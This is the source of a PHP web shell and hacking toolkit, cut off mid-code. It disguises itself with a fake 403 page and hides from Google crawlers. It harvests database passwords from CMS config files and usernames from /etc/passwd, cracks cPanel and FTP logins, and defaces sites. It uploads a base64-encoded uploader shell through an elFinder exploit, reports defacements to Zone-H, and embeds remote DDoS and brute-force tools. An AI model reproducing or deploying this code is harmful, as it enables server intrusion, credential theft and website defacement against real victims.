Tool

	<html>
	<head>
 <center>
<script type='text/javascript'>
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="http://www.loscardosmandoza.cf"});
//]]>
</script>
<script>var g=35,f=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF"),e=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS"),d="*",m=0.6,a=22,b=8,c=1,j=new Array(),k,l,x,n=new Array(),o=new Array(),p=new Array(),q=navigator.userAgent,r=document.all&&document.getElementById&&!q.match(/Opera/),s=document.getElementById&&!document.all,u=q.match(/Opera/),t=r||s||u;function y(z){return Math.floor(z*Math.random())}function v(){if(r||u){k=document.body.clientHeight;l=document.body.clientWidth;}else if(s){k=window.innerHeight;l=window.innerWidth;}var h=a-b;for(i=0;i<=g;i++){o[i]=0;p[i]=Math.random()*15;n[i]=0.03+Math.random()/10;j[i]=document.getElementById("s"+i);j[i].style.fontFamily=e[y(e.length)];j[i].size=y(h)+b;j[i].style.fontSize=j[i].size;j[i].style.color=f[y(f.length)];j[i].sink=m*j[i].size/5;if(c==1){j[i].posx=y(l-j[i].size)}if(c==2){j[i].posx=y(l/2-j[i].size)}if(c==3){j[i].posx=y(l/2-j[i].size)+l/4};if(c==4){j[i].posx=y(l/2-j[i].size)+l/2}j[i].posy=y(2*k-k-2*j[i].size);j[i].style.left=j[i].posx;j[i].style.top=j[i].posy}w()}function w(){for(i=0;i<=g;i++){o[i]+=n[i];j[i].posy+=j[i].sink;j[i].style.left=j[i].posx+p[i]*Math.sin(o[i]);j[i].style.top=j[i].posy;if(j[i].posy>=k-2*j[i].size||parseInt(j[i].style.left)>(l-3*p[i])){if(c==1){j[i].posx=y(l-j[i].size)}if(c==2){j[i].posx=y(l/2-j[i].size)}if(c==3){j[i].posx=y(l/2-j[i].size)+l/4}if(c==4){j[i].posx=y(l/2-j[i].size)+l/2}j[i].posy=0}}var x=setTimeout("w()",50)}for(i=0;i<=g;i++){document.write("<span id='s"+i+"' style='position:absolute;top:-"+a+"'>"+d+"</span>")}if(t){window.onload=v}</script><div style="position:absolute;left:36%;top:46%"></div><style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white}</textarea><br>


</form>
 <style>
 	body {
background-color:#1D1B1B;
background-image:url('http://www.userlogos.org/files/backgrounds/macleod.mac/Map1280x800.jpg');
color:white;
}
/*Gak usah banyak bacod :D  */
#cat-nav {background:#156994;margin:0 15px;padding:0;height:35px;}
#cat-nav a { color:#eee; text-decoration:none; text-shadow: #033148 0px 1px 0px;border-right:1px solid #156994;}
#cat-nav a:hover { color:#fff; }
#cat-nav li:hover { background:#000; }
#cat-nav a span { font-family:Verdana, Geneva, sans-serif; font-size:11px; font-style:normal; font-weight:400; color:#fff; text-shadow:none;}
#cat-nav .nav-description { display:block; }
#cat-nav a:hover span { color:#fff; }
#secnav, #secnav ul { position:relative; z-index:100; margin:0; padding:0; list-style:none; line-height:1; background:#0d5e88; }
#secnav a { font-family:Georgia, "Times New Roman", Times, serif; font-style:italic; font-weight:700; font-size:14px; display:block; z-index:100; padding:0 15px; line-height:35px; text-decoration:none;}
#secnav li { float:left; width: auto; height:35px;}
#secnav li ul  { position: absolute; left: -999em; width: 200px; top:35px}
#secnav li ul li  { height:30px; border-top:1px solid #fff; }
#secnav li ul li a  { font-family:Verdana, Geneva, sans-serif; width:180px; line-height:30px; padding:0 10px; font-size:11px; font-style:normal; font-weight:400; color:#eee; }
#secnav li ul ul  { margin: -30px 0 0 180px; }
#secnav li:hover ul ul, #secnav li:hover ul ul ul, #secnav li.sfhover ul ul, #secnav li.sfhover ul ul ul { left:-999em; }
#secnav li:hover ul, #secnav li li:hover ul, #secnav li li li:hover ul, #secnav li.sfhover ul, #secnav li li.sfhover ul, #secnav li li li.sfhover ul { left: auto; }
#secnav li:hover,#secnav li.hover  { position:static; }
#cat-nav #secnav {width:100%;margin:0 auto;}
</style>
<?php
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
echo"
<title> Forbidden</title>
</head><body>
<div id='forbid'>
<h1>Forbidden</h1>

<p>You don't have permission to access URL on this server.<br>
Server unable to read htaccess file, denying access to be safe
<br><br>
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p></div>";

if($_GET['login']=='3RR0R'){

    echo'
<style>
body{
background:#000;
backgroud-size:100%;
}
input{
text-align:center;
border-top:3px solid blue;
border-left:3px solid blue;
border-bottom:3px solid #fff;
border-right:3px solid #fff;
background:transparent;
color:#333;
}
input:hover{
transition-duration:0.5s;
-o-transition-duration:0.5s;
-moz-transition-duration:0.5s;
-webkit-transition-duration:0.5s;
border-style:dashed;
cursor:pointer;
}
#forbid{
	display:none;
}
table{
	margin-top:25px;
}

    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
?>
<html>
<head>
<title>LoscardosMandoza</title>

</style>
</head>
<table width="200" border="0" cellpadding="3" cellspacing="1" align="center">
<?php
echo "$cdir</a>";
echo "<hr>";
echo "<center>";
echo "<ul>";
echo "<li>";
echo "<div id='cat-nav'>";
echo "<ul class='fl' id='secnav'>";
echo "<li><a href='?'>Home</a>";
echo "<li><a href='#'>Exploit</a>";
echo "<ul id='sub-custom-nav'>";
echo "<li><a href='?dir=$dir&xai=hashid'>Hash ID</a>";
echo "<li><a href='?dir=$dir&xai=bing'>Bing Grabber</a>";
echo "<li><a href='?dir=$dir&xai=ende'>Encode Decode</a>";
echo "<li><a href='?dir=$dir&xai=sqli'>Sqli Scanner</a>]";
echo "<li><a href='?dir=$dir&xai=tvon'>Tevolution Auto Exploit</a>";
echo "<li><a href='?dir=$dir&xai=wpbf'>WP Brute Force</a>";
echo "<li><a href='?dir=$dir&xai=pretashopa'>Pretashopa Exploiter</a>";
echo "<li><a href='?dir=$dir&xai=csrfup'>CSRF Exploiter</a>]";
echo "<li><a href='?dir=$dir&xai=lokomedia'>Lokmedia Auto Exploit</a>";
echo "<li><a href='?dir=$dir&xai=mirrorh'>Mirrorh</a> ";
echo "<li><a href='?dir=$dir&xai=bfmc'>Brute Force Magento</a>";
echo "<li><a href='?dir=$dir&xai=dbdm'>DataBase Dumb</a>";
echo "</ul>";
echo "</li>";
echo "<li><a href='#'>Exploit2</a>";
echo "<ul id='sub-custom-nav'>";
echo "<li><a href='?dir=$dir&xai=ddos'>DDOS Online</a>";
echo "<li><a href='?dir=$dir&xai=jquery'>Jquery Auto Exploit</a>";
echo "<li><a href='?dir=$dir&xai=whois'>Whois</a>";
echo "<li><a href='?dir=$dir&xai=drupal'>Drupal Auto Exploit</a>";
echo "<li><a href='?dir=$dir&xai=tools'>Tools</a>]";
echo "<li><a href='?dir=$dir&xai=wevdav'>Webdav Auto Deface</a>";
echo "<li><a href='?dir=$dir&xai=joomscan'>Joomla Scan</a>";
echo "<li><a href='?dir=$dir&xai=zoneh'>Zone-H</a>";
echo "<li><a href='?dir=$dir&xai=defacerid'>Defacer.ID</a>";
echo "<li><a href='?dir=$dir&xai=elfinder'>Elfinder Auto Exploit</a>";
echo "<li><a href='?dir=$dir&xai=popoji'>Popoji Auto Register</a> ";
echo "<li><a href='?dir=$dir&xai=twitter'>Brute Force Twitter</a>";
echo "<li><a href='?dir=$dir&xai=admf'>Admin Finder</a>";
echo "<li><a href='?dir=$dir&xai=ports'>Ports Scanner</a>";
echo "</li>";
echo "</ul>";
echo "<li><a href='?dir=$dir&xai=contac'>Contact Me</a>";
echo "</li>";
echo "<li><a href='?dir=$dir&xai=blog'>BlogSpot</a>";
echo "</li>";
echo "</center>";
echo "</hr>";
if($_GET['xai'] == 'cpftp_auto') {
	echo "<center>";
	if($_POST['crack']) {
		$usercp = explode("\r\n", $_POST['user_cp']);
		$passcp = explode("\r\n", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysql_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							//
						} else {
							echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
							$ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
							$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
							if((!$ftp_login) || (!$ftp_conn)) {
								echo "[+] <font color=red>Login Gagal</font><br><br>";
							} else {
								echo "[+] <font color=lime>Login Sukses</font><br>";
								$fi = htmlspecialchars($_POST['file_deface']);
								$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
								if($deface) {
									$i++;
									echo "[+] <font color=lime>Deface Sukses</font><br>";
									if(function_exists('posix_getpwuid')) {
										$domain_cp = file_get_contents("/etc/named.conf");
										if($domain_cp == '') {
											echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
										} else {
											preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
											foreach($domains_cp[1] as $dj) {
												$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
												$user_cp_url = $user_cp_url['name'];
												if($user_cp_url == $ucp) {
													echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
													break;
												}
											}
										}
									} else {
										echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
									}
								} else {
									echo "[-] <font color=red>Deface Gagal</font><br><br>";
								}
							}
							//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses deface ".$i." Cpanel <font color=lime>.</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		Filename: <br>
		<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
		Deface Page: <br>
		<input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp\n";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($dir) {
			$pass = "";
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."\n";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."\n";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
				} elseif(preg_match("/client/", $ambil)) {
					preg_match("/password=(.*)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."\n";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."\n";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($dir);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Hajar'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
	}
	}elseif($_GET['xai'] == 'defacerid') {
echo "<center><form method='post'>
		<u>Defacer</u>: <br>
		<input type='text' name='hekel' size='50' value='Fuck'><br>
		<u>Team</u>: <br>
		<input type='text' name='tim' size='50' value='XaiSyndicate'><br>
		<u>Domains</u>: <br>
		<textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
		<input type='submit' name='go' value='Submit' style='width: 450px;'>
		</form>";
$site = explode("\r\n", $_POST['sites']);
$go = $_POST['go'];
$hekel = $_POST['hekel'];
$tim = $_POST['tim'];
if($go) {
foreach($site as $sites) {
$zh = $sites;
$form_url = "https://www.defacer.id/notify";
$data_to_post = array();
$data_to_post['attacker'] = "$hekel";
$data_to_post['team'] = "$tim";
$data_to_post['poc'] = 'SQL Injection';
$data_to_post['url'] = "$zh";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $form_url);
curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
$result = curl_exec($curl);
echo $result;
curl_close($curl);
echo "<br>";
}
}
} elseif($_GET['xai'] == 'zoneh') {
	if($_POST['submit']) {
		$domain = explode("\r\n", $_POST['url']);
		$nick =  $_POST['nick'];
		echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
		echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
		function zoneh($url,$nick) {
			$ch = curl_init("http://www.zone-h.com/notify/single");
				  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
				  curl_setopt($ch, CURLOPT_POST, true);
				  curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
			return curl_exec($ch);
				  curl_close($ch);
		}
		foreach($domain as $url) {
			$zoneh = zoneh($url,$nick);
			if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
				echo "$url -> <font color=lime>OK</font><br>";
			} else {
				echo "$url -> <font color=red>ERROR</font><br>";
			}
		}
	} else {
		echo "<center><form method='post'>
		<u>Defacer</u>: <br>
		<input type='text' name='nick' size='50' value='XaiSyndicate'><br>
		<u>Domains</u>: <br>
		<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
		<input type='submit' name='submit' value='Submit' style='width: 450px;'>
		</form>";
	}
	echo "</center>";

} elseif($_GET['xai'] == 'adminer') {
	$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
	function adminer($url, $isi) {
		$fp = fopen($isi, "w");
		$ch = curl_init();
		 	  curl_setopt($ch, CURLOPT_URL, $url);
		 	  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
		 	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		 	  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		   	  curl_setopt($ch, CURLOPT_FILE, $fp);
		return curl_exec($ch);
		   	  curl_close($ch);
		fclose($fp);
		ob_flush();
		flush();
	}
	if(file_exists('adminer.php')) {
		echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
	} else {
		if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
			echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
		} else {
			echo "<center><font color=red>gagal buat file adminer</font></center>";
		}
	}
	} elseif($_GET['xai'] == 'joomscan') {
{
    ?>
    <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
    <?php
	echo '

<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
<form method="POST">
        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
</form><center>

';
@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);

function check_exploit($comxx){

$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";

$result = @file_get_contents($link);

if (eregi("No results",$result))  {

echo"<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>";

}else{

echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";

}
}

function check_com($url){

$source = @file_get_contents($url);

preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

foreach(array_unique($arz) as $x){
$coms[]=$x;
}

foreach($coms as $comm){

echo "<tr><td>$comm</td>";
check_exploit($comm);
}

}

function sec($site){
preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
if(eregi("www",$sites[0][0])){
return $site=str_replace("index.php","",$sites[0][0]);
}else{
return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
}}

$npages = 50000;

if ($_POST)
{
  $ip = trim(strip_tags($_POST['site']));
  $npage = 1;
  $allLinks = array();


   while($npage <= $npages)
  {

  $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);


        if ($x)
        {
                preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink);

                foreach ($findlink[1] as $fl)

                $allLinks[]=sec($fl);


                $npage = $npage + 10;

                if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
                        break;
        }

    else
                break;
  }


$allDmns = array();

foreach ($allLinks as $kk => $vv){

$allDmns[] = $vv;
}

echo'<table border="1"  width=\"80%\" align=\"center\">
<tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>
<tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
</table>';
echo "<br><br>";

echo'<table border="1" width="80%" align=\"center\">';

foreach(array_unique($allDmns) as $h3h3){

echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>';

check_com($h3h3);

}

echo"</table>";

}
}

} elseif($_GET['xai'] == 'csrfup')
{
echo '<html>
<center><h1 style="font-size:33px;">CSRF Exploiter Online</h1><br><br>
<font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
<br><br>
<form method="post" style="font-size:25px;">
URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
<input type="submit" name="d" value="Lock!">
</form>';
$url = $_POST["url"];
$pf = $_POST["pf"];
$d = $_POST["d"];
if($d) {
	echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
</html>";
}
} elseif($_GET['xai'] == 'elfinder') {

echo '<html>
</style>
<form method="post">
Target: <br>
<textarea name="target" placeholder="http://www.target.com/elFinder/php/connector.php" style="width: 600px; height: 250px; margin: 5px auto; resize: none;"></textarea><br>
<input type="submit" name="x" style="width: 150px; height: 25px; margin: 5px;" value="hajar">
<html style="margin: 2em auto; color: #008000; background: #000000;"></html>
</form>
</html>';}
function ngirim($url, $isi) {
$ch = curl_init ("$url");
	  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
	  curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
	  curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
	  curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
	  curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
	  curl_setopt ($ch, CURLOPT_POST, 1);
	  curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
	  curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
	  curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data3 = curl_exec ($ch);
return $data3;
}
$target = explode("\r\n", $_POST['target']);
if($_POST['x']) {
	foreach($target as $korban) {
		$nama_doang = "k.php";
		$isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
		$decode_isi = base64_decode($isi_nama_doang);
		$encode = base64_encode($nama_doang);
		$fp = fopen($nama_doang,"w");
		fputs($fp, $decode_isi);
		echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
		echo "# Upload[1] ......<br>";
		$url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
		$b = file_get_contents("$url_mkfile");
 		$post1 = array(
				"cmd" => "put",
				"target" => "l1_$encode",
				"content" => "$decode_isi",
				);
 		$post2 = array(
 				"current" => "8ea8853cb93f2f9781e0bf6e857015ea",
 				"upload[]" => "@$nama_doang",);
 		$output_mkfile = ngirim("$korban", $post1);
 		if(preg_match("/$nama_doang/", $output_mkfile)) {
    		echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
		} else {
 			echo "# Upload Failed 1 <br># Uploading 2..<br>";
			$upload_ah = ngirim("$korban?cmd=upload", $post2);
			if(preg_match("/$nama_doang/", $upload_ah)) {
    			echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br><br>";
			} else {
    			echo "# Upload Failed 2<br><br>";
			}
		}
	}
}elseif($_GET['do'] == 'ports') {
    echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
    echo '<div class="content">';
    echo '<form action="" method="post">';

    if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
        $start = strip_tags($_POST['start']);
        $end = strip_tags($_POST['end']);
        $host = strip_tags($_POST['host']);
        for($i = $start; $i<=$end; $i++){
            $fp = @fsockopen($host, $i, $errno, $errstr, 3);
            if($fp){
                echo 'Port '.$i.' is <font color=green>open</font><br>';
            }
            flush();
        }
    } else {
        echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
              <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
              <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
              Host: <input type="text" name="host" value="localhost"/><br /><br />
              Port start: <input type="text" name="start" value="0"/><br /><br />
              Port end:<input type="text" name="end" value="5000"/><br /><br />
              <input type="submit" value="Scan Ports" />
              </form></center><br /><br />';
    echo '</div></table></td>';}
} elseif($_GET['xai'] == 'admf') {
        echo "<iframe src='http://pertolonganpertama.com/admf.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'popoji') {
        echo "<iframe src='http://pertolonganpertama.com/popoji.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'webdav') {
        echo "<iframe src='http://pertolonganpertama.com/webdav.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'bfmc') {
        echo "<iframe src='http://pertolonganpertama.com/bfmc.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'dbdm') {
        echo "<iframe src='http://pertolonganpertama.com/dbdump.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'hashid') {
        echo "<iframe src='http://pertolonganpertama.com/hashid.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'ddos') {
        echo "<iframe src='http://pertolonganpertama.com/ddos.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'jquery') {
        echo "<iframe src='http://pertolonganpertama.com/jquery.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'whois') {
        echo "<iframe src='http://pertolonganpertama.com/whois.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'ende') {
        echo "<iframe src='http://pertolonganpertama.com/ende.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'wpbf') {
        echo "<iframe src='http://pertolonganpertama.com/wpbf.php' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";

} elseif($_GET['xai'] == 'sqli') {
